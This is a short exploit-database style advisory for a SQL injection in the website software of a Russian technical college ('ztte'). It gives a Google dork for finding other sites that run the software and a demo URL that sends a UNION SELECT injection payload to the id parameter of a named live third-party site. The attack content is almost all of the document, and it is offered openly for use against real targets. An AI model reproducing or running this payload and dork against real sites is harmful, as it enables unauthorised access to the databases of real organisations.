# Exploit Title: ztte sql injection
# Google Dork: "ГБОУ ПОО "Златоустовский техникум технологий и экономики"
# Date: 2020.03.10
# Exploit Author: Milad Karimi
# Vendor Homepage: http://www.ztte.ru/
# Software Link: http://www.ztte.ru/
# Category : webapps
# Version: 1.0
# Tested on: windows 10 , firefox
# CVE : CWE-89
################################################
proof of concept :
Sql Injection Vulnerability
1- search google Dork : "ГБОУ ПОО "Златоустовский техникум технологий и экономики"
2- sql injection
demo
http://www.miassgrk.ru/page.php?table=settings&id=-3+union+select+1,2,3,4,5--
#Discovered by : Milad Karimi